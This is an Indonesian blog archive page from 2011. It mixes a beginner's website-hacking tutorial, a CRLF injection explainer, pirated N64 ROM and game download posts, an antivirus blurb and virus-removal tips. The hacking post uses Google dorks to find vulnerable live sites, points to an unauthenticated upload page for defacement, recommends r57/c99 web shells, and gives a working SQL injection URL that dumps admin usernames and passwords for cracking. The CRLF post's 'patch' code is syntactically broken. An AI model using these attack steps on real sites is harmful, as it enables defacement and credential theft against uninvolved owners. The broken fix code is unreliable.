Jumat, 24 Juni 2011

mengulas Tutor Hacking Buat Pemula

Ok, di posting saya kali ini, saya akan mengulas lagi bagaimana cara untuk hacking website dan mendefacex untuk para pemula, jadi kita cukup menggunakan dork aja,,

pertama2 buka milw0rm,


Contoh target adalaha ourspace 2.0
pertama cuba buka milw0rm trus klik search, lalu ketik RFI, FILE atau SQL. Disini kita ambil bug
http://www.milw0rm.com/exploits/4343.

1. Buka google, trus ketik allinurl:"/cgi-bin/ourspace/ pada search enginenya.

2. Setelah itu cari situs yang mau di cuba
misalnya neh :
Code:
http://www.2coolcode.com/cgi-bin/ourspace//login.cgi

3. Hapus /cgi-bin/ourspace//login.cgi ganti dengan
Code:
/cgi-bin/ourspace/newswire/uploadmedia.cgi

4. Setelah itu muncul upload files

5. Lu bikin html yang bagus terus upload dah...


Hacking RFI (Remote File Inclusion)
---------------------------------
1. Buka google lalu ketik "Php Blue Dragon"
2. Setelah itu cari situs yang mau dicoba
Contohnya : http://www.komix91.ovh.org. Bugnya cari aja di http://www.milw0rm.com
trus ketik PHP BLUE DRAGON. Hasil dari serach pada milw0rm.
Code:
- http://milw0rm.com/exploits/1779 - http://milw0rm.com/exploits/1913 - http://milw0rm.com/exploits/4276

selanjutnya kalian coba aja sendiri ya. Jangan lupa gunakan shell (r57, c99, dll)

3. Selamat mencoba !

SQL Injection
--------------

Seperti biasa kita membuka site milw0rm untuk melihat bug SQL
contoh BUG SQL http://www.milw0rm.com/exploits/5177

1. Buka google trus ketik allinurl:"com_simpleshop" atau allinurl: "com_simpleshop"section disamping kiri ini berupa dork untuk mencari bug sql pada web.

2. kalau kita telah mendapatnya sekarang kita injeck. Contoh :

Code:
http://www.target.com/index.php?option=com_simpleshop&Itemid=S@BUN&cmd=section&section=-000/**/union+select/**/000,111,222,concat(username,0x3a,password),0,concat(username,0x3a,password)/**/from/**/jos_users/*


3. Kalau ada hasilnya, silakan deskripsi password adminnya menggunakan tools MD5 crack, bisa menggunakan ini http://thesoftwareengineer.org/services/md5.php

4. Selamat Mencuba

NB: Segala tindakan yang anda lakukan bukanlah tanggung jawab kami,
»»  READMORE...
Read more

Tutorial CRLF

CRLF INJECTION ATTACK
atau biasa juga di sebut sebagai HTTP response splitting
yaitu serangan web yang memanipulasi sanatization php code yg memang sengaja
di injeksi ama user.
biasanya si attacker memanfaatkan kelemahan aplikasi web untuk melakukan
berbagai macam serangan kek XSS,cross user defacement,bahkan positionin cache web klien.

MEKANISME CRLF INJECTION

CRLF (CARRIAGE RETURN and LINE FEED) menggunakan kedua karakter khusus yang mewakili
End Of Line (EOL) sebagai penanda untuk protokol internet,tapi kagak terbatas
pada MIME (e-mail,NNTP (newsgroup) dan yang lebih penting HTTP.

CONTOH SERANGAN :

misalkan kita mengelola site yang ada bug CRLF si attacker ini bakal ngirim email
ke salah satu site admin kita yang berisi link CRLF-crafted,link ini seh

Code:
http://www.surabayahackerlink.org/news.php?page =% 0D% 0aContent-Type: text / html% 0D% 0aHTTP/1.1 200% OK 0D% 0aContent-Type: text / html% 0D% 0A% 0D % 0a% 3EHACKED 3CSOMEONE%% 3E% content 3C/html

tampaknya baek-baek ajah,tapi pas kita klik dan ke--redirect
ke site kita link nya
bakal nampil kek gini :

[code]http://surabayahackerlink:2082/frontend/x3/index.html?post_login =% 0D% 0aContent-Type: text / html% 0D% 0aHTTP/1.1 200% OK 0D% 0aContent-Type: text / html% 0D% 0A% 0D % 0a% 3EHACKED 3CSOMEONE%% 3E% content 3C/html

[Image: contoh.jpg]

HACKED SOMEONE

serangan ini seh cuma munculin kata-kata pada mesin korbang
tapi bahaynya adalah bahwa server kita menghasilkan kode HTML,sehingga
si attacker bakal lebih gampan inject html code ke browser web kita
akibatnya serangan ini bisa menyebabkan poisoning of cache pada web client,cookie,XSS
entah perusakan permanen ato sementara pada halaman web kita [ hoyoh,lagi-lagi kita prustasi ]
bahkan pencurian informasi pada database!!!

balik ke link tsb,misal kita melihat yang ini :

Code:
http://www.surabayahackerlink.org/news.php?page =% 0D% 0aContent-Type: text / html% 0D% 0aHTTP/1.1 200% OK 0D% 0aContent-Type: text / html% 0D% 0A% 0D % 0a% 3EHACKED 3CSOMEONE%% 3E% content 3C/html

mungkin beberapa pars code
Quote:"event 0a% pattern% oD"
pattern ini adalah setara dengan pengiriman request http crlf dan merupakan
alasan mengapa kita sebut teknik ini sebuah CRLF injection [ tuh,kan hm kita lagi-kita lagi,lagi-lagi kita]


PENCEGAHAN :

sebenrnya seh,cara pencegahannya tuh gampang-gampang susah,gk beda kl kita ngupil pake jari
telunjuk kaki kiri Tongue cuma membersihkan URL yg mengarah ke halaman web di situs kita yang
berisi kode server return line.pentest wat cari bug ini sangat susah (menurut ane)
karena aplikasi web yang paling banyak digunakan saat ini adalah
sisi-server redirect.sehingga lokasi kerentanan ini tidak selalu jelas.
[*tapi jangan salah buktinya forum ane yg ane pentest juga kena bug ini :( ]
serangan dan vulnerabilitas laennya,bisa digunakan memeriksa kekuatan password
pada halaman otentikasi dan secara otomatis audit shopping cart,form,dynamic content dan
applikasi web laennya.

PATCH :
walopun serem,tapi patchnya kagak sesulit ngupil
pake jari telunjuk kaki kiri,VULNERABILITAS CRLF sangat mudah untuk patch.
Contoh kode berikut mengasumsikan input yang setting ke
$['input']_POST

Code:
if (eregi('n',['input']$_POST)); // ini memeriksa untuk karakter baris baru pada variabel POST
{// Start if ..
die ("CRLF Attack Terdeteksi"); // program keluar jika CRLF ditemukan dalam variabel
} // End if ..

ane dapetin bug ini karena pake w3af.
credit schumbag devilzc0de
»»  READMORE...
Read more

Rabu, 22 Juni 2011

Nintendo 64 PC Emulator + 157 Games

Nintendo 64 PC Emulator + 157 Games


Nintendo 64 for the pc. Actual N64 games can be played on your pc through emulators and roms. I've included 157 games that I love to play.

GAMES LIST:
007 goldeneye
007 the world is not enough
Akumajou Dracula Mokushiroku - Real Action Adventure (J) [!]
Akumajou Dracula Mokushiroku Gaiden - Legend of Cornell (J) [!]
Armorines - Project S.W.A.R.M. (E) [!]
Banjo-Tooie (A) [!]
beastwars
Bomberman 64 - Arcade Edition (J) [f2] (PAL-CRC)
Bomberman 64 (E) [!]
Bomberman Hero
Charlie Blast's Territory (E) [o1]
Choro Q 64 II (J) [!]
Command & Conquer (E) [!]
Custom Robo (J) [!]
Custom Robo V2 (J) [!]
CyberTiger (E) [!]
Deadly Arts (U) [!]
deadlyarts
Dezaemon 3D (J) [!]
Disney's Donald Duck - Goin' Quackers (U) [!]
Disney's Tarzan (E) [!]
Donkey Kong 64 - Kiosk (U) [!]
Doom 64
dualheroes
duck dodger starring daffy duck
dukenukem 64
dukenukem zerohour
Earthworm_Jim_3D
ECW Hardcore Revolution (E) [!]
Eikou no Saint Andrews (J) [!]
Excitebike 64 - Kiosk (U) [!]
Extreme-G (E) [!]
Extreme-G XG2 (E) [!]
extremeg
extremeg2
Famista 64 (J) [!]
Fighting Force 64 (E) [!]
Flying Dragon (E) [!]
Forsaken 64 (E) [!]
F-ZERO X (E) [!]
Ganbare Goemon - Derudero Douchuu Obake Tenkomori (J) [!]
Ganbare Goemon - Neo Momoyama Bakufu no Odori (J) [b1]
Gauntlet Legends (E) [!]
getterlovechorenaipartygamejap
Gex 3 Deep Cover Gecko
Gex Enter the Gecko
glover
GoldenEye 007
goldennugget64
Hercules - The Legendary Journeys (E) [!]
Hexen (E) [!]
Hey You, Pikachu! (U) [!]
Hybrid Heaven (E) (M3) [!]
Hydro Thunder (E) [!]
Kirby 64 - The Crystal Shards (E) [!]
Lode Runner 3-D (E) [!]
Mace - The Dark Age (E) [!]
Mario Kart 64
marioparty
marioparty2
marioparty3
Mega Man 64 (U) [!]
Midway's Greatest Arcade Hits Volume 1 (U) [o1]
Mike Piazza's Strike Zone (U) [!]
Mischief Makers (E) [!]
Mission Impossible (E) [!]
Monopoly (U) [!]
Mortal Kombat 4 (E) [!]
Mortal Kombat Mythologies - Sub-Zero (E) [!]
Mortal Kombat Trilogy (E) [!]
Ms. Pac-Man - Maze Madness (U) [!]
namco museum 64
nightmare creatures
nuclear strike64
ogre battle 64 person of Lord lycaliber (jap)
Onegai Monsters (J) [!]
Operation WinBack (E) (M5) [!]
Paperboy (E) [!]
paperboy
papermario
PD Ultraman Battle Collection 64 (J) [!]
Perfect Dark (U) (V1.0) [!]
Pokemon Snap
power puff girls chemical xtraction
power rangers light speed rescue
premier manager 64
Puyo Puyo 4 - Puyo Puyo Party (J) [!]
Puyo Puyo Sun 64 (J) [!]
quake
Quake II (E) [!]
quest64
Rakuga Kids (E) [!]
rallychallenge
rampage
Rampage 2 - Universal Tour (E) [!]
Rat Attack (E) (M6) [!]
Rayman 2 - The Great Escape (E) (M5) [!]
Razor Freestyle Scooter (U) [!]
Re-Volt (E) (M4) [!]
revolt
Robot Ponkottsu 64 - Caramel of the 7 Seas (J) [!]
Robotech - Crystal Dreams (Beta) [a1]
robotron64
Rugrats - Treasure Hunt (E) [!]
Rugrats in Paris - The Movie (E) [!]
scars
Scooby-Doo! - Classic Creep Capers (E) [!]
Shadow Man (E) [!]
Shadow of the Empire
Shadowgate 64 - Trials of the Four Towers (E) [!]
shadow of the emp
silicon valley
Sim City 2000 (J) [o1]
smash brothers
snowboard kids
snowboard kids 2
South Park - Chef's Luv Shack (E) [!]
South Park Rally (E) [!]
south park
south park rally
Space Invaders (U) [!]
Spider-Man (U) [!]
Star Fox 64 (J) [o1]
Star Wars Episode I - Racer (E) (M3) [!]
StarCraft 64 (E) [!]
Starshot - Space Circus Fever (E) (M3) [!]
starsoldier
Super B-Daman - Battle Phoenix 64 (J) [!]
Super Robot Spirits (J) [!]
Super Robot Taisen 64 (J) [!]
Super Smash Bros. (E) (M3) [!]
Supercross 2000 (E) [!]
Superman (E) (M6) [!]
super mario 64
Tigger's Honey Hunt (E) (M7) [!]
Tom and Jerry in Fists of Furry (E) [!]
Tonic Trouble (U) (V1.1) [!]
tony hawk pro skater
Tony Hawk's Pro Skater 2 (E) [!]
Tony Hawk's Pro Skater 3 (U)
Turok Dinosaur Hunter
Turok 2 Seeds of Evil Kiosk
Turok 3 Shadow of Oblivion
turok rage wars
turokragewars
twistededge
vigilante 8
virtual chess
virtual pool 64
wargods
Wetrix (E) (M6) [!]
Wipeout 64 (E) [!]
Wonder Project J2 (J) [!]
Xena Warrior Princess - The Talisman of Fate (E) [!]
zelda 64
zelda majoras mask
zelda master quest

INSTALLATION:

  1. Extract
  2. Use and emulator to open the desired game
  3. Play

 Free Download Game Gratis
Total Size 1.74 GB
DOWNLOAD FS
DOWNLOAD HF
DOWNLOAD MF
»»  READMORE...
Read more

Minggu, 19 Juni 2011

BitDefender Antivirus Pro 2011


BitDefender Antivirus Pro 2011 – Program Antivirus Profesional dengan fitur yang dirancang untuk keamanan tambahan pada komputer Anda. Program ini sangat maju dan proaktif dalam hal memberikan perlindungan terhadap virus, spyware, phising dan pencurian identitas, tanpa memperlambat komputer Anda.
Versi terbaru dari antivirus BitDefender Antivirus Pro 2011 memperluas akses cepat scan, tutorial untuk video pelatihan, output dari tooltips cerdas, membuat shortcut pada toolbar, peringatan tentang potensi bahaya pencarian
Saat ini juga BitDefender adalah perangkat lunak antivirus yang dapat digunakan untuk Microsoft Windows, Symbian OS, Windows Mobile, Mac OS X (beta) dan freeBSD. BirDefender tersedia dalam 2 macam yaitu yang berlisensi berbayar dan yang berlisensi gratis.


»»  READMORE...
Read more

Jumat, 17 Juni 2011

hapus recycler

Nah Komupdate bgi tips lgi nih tentang membasmi virus recycler karna virus ini lumayan berbahaya saya kasih tau tips nya..... Penasaran Gimana Cara Hapusnya..... ??? Langsung Aja Sedotttt Cekidott !!   Pertama-tama yang harus dilakukan adalah sebagai berikut : 
1. membuka task manager (crtl+alt+del), lalu buka tabel processes lalu kill process (matikan proses) "rundll32.exe" matikan pada username nama komputer
2. Jika sudah maka kita masuk ke command promt dengan melakukan start lalu masuk run ketikkan cmd disana
3. ketikkan attrib -s -h mso.sys
4. del mso.sys
5. hapus sisa2 virus shortcut dalam hardisk dan folder/file recycler.lnk yang berisi virus shorcut
6. ketik regedit lalu masuk mycomputer/HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/windows/currentversion/run hapus registry yang mengaktifkan recycler.ink
7. hapus starup yang mengaktifkan recycler pilih msconfig >> startup >> unchek "recycle  Nah Sekian Dari Tips Saya Nih Dihapal Ya Semoga Bermanfaat
»»  READMORE...
Read more

Selasa, 14 Juni 2011

tony hawk4 pc

Nah kali ini komupdate ada game buat penikmat skater dri game ps 1 yaitu tony hawk pro skater...Game Tony Hawk's Pro Skater 4 merupakan game sport, dengan aksi gaya bersama skatboardnya yang mana harus menyelesaikan misi yang ada. Dengan pilihan karakter bisa kawan pilih sendiri dan aksesories bisa kawan ganti dengan gaya kawan sendiri (baju, topi, sepatu, skatboard,,,, dll). bagi yang tertarik silahkan sedott

Screenshot :
Nah Bgi yang tertarik silahkan Klik Disini Untuk Download Tony Hawks
Semoga Bermanfaat
»»  READMORE...
Read more